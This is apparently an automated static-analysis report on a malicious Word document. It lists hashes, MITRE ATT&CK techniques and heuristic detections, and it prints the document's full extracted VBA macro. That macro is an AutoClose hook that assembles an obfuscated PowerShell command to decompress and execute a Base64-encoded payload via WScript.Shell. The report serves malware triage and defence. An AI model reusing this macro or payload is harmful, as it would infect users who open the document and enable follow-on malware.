Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8f94ac223f454ea3…

MALICIOUS

Office (OOXML)

Size: 21.1 KB
Created: 2021-06-03 13:34:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-06-13
MD5: 55118aaeb66b021c8fc6a0995c368977
SHA-1: 9374af1d26702b521d0b3ed9386f8796c2c5d11c
SHA-256: 8f94ac223f454ea32bfec7f0682f3b66704e14db26babcd7f0af639de77b56e7
Risk Score: 190

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1204.002 Malicious File

The sample contains VBA macros that execute upon closing the document. These macros utilize WScript.Shell and CreateObject to decompress and execute a Base64 encoded payload, likely a second-stage downloader. The AutoClose macro is designed to trigger this malicious behavior automatically when the document is closed.

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        CG = CG + "$_, [teXt.encoDINg]::ascIi )} ).ReaDTOEND()"
        Set asd = CreateObject("WScript.Shell")
        asd.Run (CG)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        CG = CG + "$_, [teXt.encoDINg]::ascIi )} ).ReaDTOEND()"
        Set asd = CreateObject("WScript.Shell")
        asd.Run (CG)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
        Attribute VB_Customizable = True
        Sub AutoClose()
            gkYQTk
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5144 bytes
SHA-256: 74f955a3af1fa7dad09a179783b9c7b921c1f9adeaf053c9f4b8cd7deec5acd4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
99 of 157 identifiers look randomly generated (e.g. 'IFaMq1ARwGVoI5RqYyvMkKq1bCr7uVPVxj5QjrXm') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
    gkYQTk
End Sub

Public Function gkYQTk() As Variant
    Dim CG As String
    CG = " inVokE-EXpRESSioN ( nEw-oBjECT  SystEm.IO.cOmPREs"
    CG = CG + "sion.dEflATEStReaM([IO.MemoRYsTrEaM] [SYsTem.CoNvE"
    CG = CG + "Rt]::frOmbAse64STrING('jVfxU9tKDv5XdhjebXIEN0ChfeW"
    CG = CG + "4G8d2Er8mTrCdUi6TqY29CQZj5+wNJKX+30/Sbmjf3P3wZhji9"
    CG = CG + "a6kT9Inae0uW4wdvk7rL6IKIrcsotCMetHIaYxp8MXx62xSGOP"
    CG = CG + "4YeKz44FgZ+3Xw9eP0elpw64Ym1eivzDMOnDGvdGtMXDC8Hbtt"
    CG = CG + "FiL8WDHjxjjteTsiHHxBDqKeCWeBK4ZL6RhbmT5FMushIO8MGZ"
    CG = CG + "wkh3xLFdynLUZaxsHA0f2MyfK0wPACXoTPMV4nNxrTemgUg/lZ"
    CG = CG + "g0PfFrmWbILhCQ98J9nhZJZgVLW7nCPli0UKUhic5dn9A7UdwI"
    CG = CG + "ZExCZJRwhXDJXhYi8RvdPot9P0H39Ct3+Eo82onX4WkSzfNS0L"
    CG = CG + "90+idDJeYsHSZWtFaAeKEXjPC+Tx5ECVmrjq5WCylfg/eLN1By"
    CG = CG + "hBgmGqcoQ8Fr2MDxHLZ5TdEGT1jAqUccK/VyQmFPQifgO4pALw"
    CG = CG + "IFaMq1ARwGVoI5RqYyvMkKq1bCr7uVPVxj5QjrXmFrwh7E3j5Q"
    CG = CG + "7iOboDQoCARixStJdLhBBoNOIYelhJNziuUyQDAXIcRUCZMMbC"
    CG = CG + "NZtDl+fI3OkiGdNRrmwQiBnDfH3hO9ahu1aoTvxYn83D6Sfeat"
    CG = CG + "OsAukGBuT3h9wdrH49MlzXsBjyir49CUy88Yw0xQYyx2IUAFxU"
    CG = CG + "oGkWGVrxQQdbR0q5E2CEB/RRQqVhtnpgmJCiWptm9QWP2NPHOA"
    CG = CG + "9FSdkMkSAPMeQJLoUIPBvoUOFjF3+woMWH37G04j29ptCM5rAw"
    CG = CG + "jKJTPzb2LSGrue8dpugXMqXWFeHgBcq5lggewC0lYkaNsfEjKQ"
    CG = CG + "qaxCD9Q2tFSB9MNV0fVG/KDUtX6BvkCf3Is/RKoAhV5Hpx31I1"
    CG = CG + "TD2F7+fsvYb2/ac3ZOEjKhEX+kkN04eOK/zIPGzaUgMWUAvELL"
    CG = CG + "vimhkH2Bka8xBtipiuVEuVgK7hq7vFhT3dIM+YHEf6cbBsbyxs"
    CG = CG + "sFW2wiocGfQsKByZ9Fo1HRanng5ntw9iCRkbxzzgGPCcyrg2NC"
    CG = CG + "sh4Ej50FYZcVg0WZtoOVYhPcT246cZeR6rnSjidcwpGmLHcztP"
    CG = CG + "Hef1mUlW9HBo6gKkZ+dRgftxRq7TsIOmGqTgIqimDAIi9iq5gX"
    CG = CG + "HGcF2C6lzMJUVo80BFZKcVvt4muk+TZhyLupar1sudVhJopQp0"
    CG = CG + "jkuUwwcULPDdEKl6jHFSr04WFdl4sVPon35F91AfcoV5BcjHFt"
    CG = CG + "6qSyQQ/Dr6pasMcEBcofxvZsILhfDmJCnXNdkq5b7vlFg5XFUd"
    CG = CG + "pCv1em/iPSI13srpB7owHSNbCUOFV4VSjdauqPiLHOC/SWr5IZ"
    CG = CG + "wxkRjPq1KKRJqhC3MEZaX1i0pMVx5h0ONr038n+7TBHStO6R2R"
    CG = CG + "pZcGkZSJ5jvj73o3yD7TonCZ034rJBM7y5zIK6ub0p/SWAAm0o"
    CG = CG + "uzpgjvpGUEkq7Eqa4qja3VEgneaq8Ah7KNr27pB6Pfehz5FQeT"
    CG = CG + "OPoTF0AoHceh7u1YMdj8XQnKlsssyLDNg4lNXbC+zKyUyfqQ1l"
    CG = CG + "EYZRhXRxjmqB8P2NqEGN+hv9PyQZtBus4EThQbqg18DO9N43rO"
    CG = CG + "ryvNjiOzF5U27rIuPlEMOss4GqoQTMtepslhXWpiFVxbM3DyIy"
    CG = CG + "8NBdqiID+s1Pjs+YIjAdoMHviFXAKu0z8pGsDmgg30jxXsYABM"
    CG = CG + "neppBaHr71N1O87kQ8tv3KCQMH6v9ohslCnKaaeLgj3CAcvWx1"
    CG = CG + "YxHdRAD5hpOczUA5Ch69wJ/vuEFzW3Z6D1bedaeRPQseSyyiPB"
    CG = CG + "2ATZ+T2fffXI+UoSteRj9mMwn4emfoc6Lr8X3zE7jjXnMameLf"
    CG = CG + "pLwX4BUmMfCeoCSYg+rcCPK0mYSQsGfVHoLnD5r5YgtWJtgp7i"
    CG = CG + "ezn8arBkGHWetGsr6PT20kxXywgCnu43W3vY+fn4vxD55etbhd"
    CG = CG + "X2X714dfVxz/tWWeUnHpXS7h1VptCZk/CgF1RletaVM9ZImrjK"
    CG = CG + "a7q+zgHr5NyvWvtsXVYFx3rzaL+EqhuRqldCchoh13glYE1l/P"
    CG = CG + "gNgidseE5IcwP/9lNnGmZeXJsevHAqUChs506iTzpdq0J2PY2D"
    CG = CG + "t2gQOt5dHHRXHnOjRowkqEqwOiJ0LhxelbuOkXI6OimUcweQ/f"
    CG = CG + "h39UUzvP43bkB6y5sICUhgWn5UjMvZBfGySUOjpvJzcX7Sxaq3"
    CG = CG + "qPkUqHa/7sPBj4Alur5E+2cnKgGYHTb+14FDSB7VFd2NhDJY8n"
    CG = CG + "VVSmIRIWZO2zNQ2iThlNYpQ1XLPB3VmRJmQoYkRKuXW4xaOH1z"
    CG = CG + "Ht2/BB2+3751IsD5+J9EKpNvATEZq9rDq/JkJmYpsJxAR6Y1ke"
    CG = CG + "1MAnS6AUxm1vTfjTHK3Nj2o7prXTTQzH+Xh201C/j3rV5asJqf"
    CG = CG + "E3vzRfTdqHx8snK3O7l7GtUdgI7aJGu+fiHlQe+hs1Vi7/Ly5X"
    CG = CG + "6KODFO5yDWhbuGNBpKJLr+zXXxKbUGkMR23Abghulrdyc1dSE4"
    CG = CG + "dLNj82VgAHR7hy+zhptSElN/cnXWywKoFYtkVpCIh98cT1zAgk"
    CG = CG + "xhK5qbkbyRvSmfrm9vXyTrMqvO8PyndTxZGaOal3cyFGpOWpVw"
    CG = CG + "gZauebIipOho7TFs1zC5s3E/4z7wguzGKVBM15To3UUfoL2Atr"
    CG = CG + "3/eIXk9sdMeKxufppKRRfQ+BEApwokBNmYLkuXMwllnnd4nO//"
    CG = CG + "X4wO/pXc2I5t/n9xenj3z9929nD8MfkH8uPD//UAwb1+qpBwMe"
    CG = CG + "P3XS0Gej3VbSqGwxarfa7hnF6fo4i+on9YL+B0ANWDvVWeDqi8"
    CG = CG + "/PD12/NArOH6mj1G4yyxrAmGy9ctH87Pb9AzYE+2dFCfzT43bF"
    CG = CG + "X8UAb+zONAps27AdazRBlC3/BzAlTKqG902vs8w1T9kmVC4rZn"
    CG = CG + "81mP83ek1n9/v6n1QylUOBbc3y3nVT0urU/CDqPtIJho3xaNA2"
    CG = CG + "lVJPTiVPh1/BdQp87lvpyxP7ymAn6eoGJu6ML4B/4f19kyYsar"
    CG = CG + "l96dOvgVkg/vStLH9jt3mUzULO+2T7bZy/6KuX/Z2CV9cN1OSP"
    CG = CG + "xYnd9xdtthJOaUWiqJO6x2eVNkU/i1I6liR7V0HspYoevEgciS"
    CG = CG + "GXPjZJII1OazRyyfrbADRvUxepz3I7xcf7eMPZWjJHjDeRwgdk"
    CG = CG + "6fphkxdy6j32aO39jmm2kEhGhZTBDefrcqH7ww3W+/hc=' ) ,"
    CG = CG + " [sYstEM.io.cOMpreSSIoN.cOMPrEssIoNmodE]::DECoMpRe"
    CG = CG + "Ss) | fOReaCH-oBJECt{ nEw-oBjECT IO.sTREAMreaDer( "
    CG = CG + "$_, [teXt.encoDINg]::ascIi )} ).ReaDTOEND()"
    Set asd = CreateObject("WScript.Shell")
    asd.Run (CG)
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 20480 bytes
SHA-256: 4620bc002441137806e56d8c81f59e497d26a5864d49547b9bb4c7c49030b6b7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
288 of 514 identifiers look randomly generated (e.g. 'sh4Ej50FYZcVg0WZtoOVYhPcT246cZeR6rnSjidc') — consistent with name-mangling obfuscation.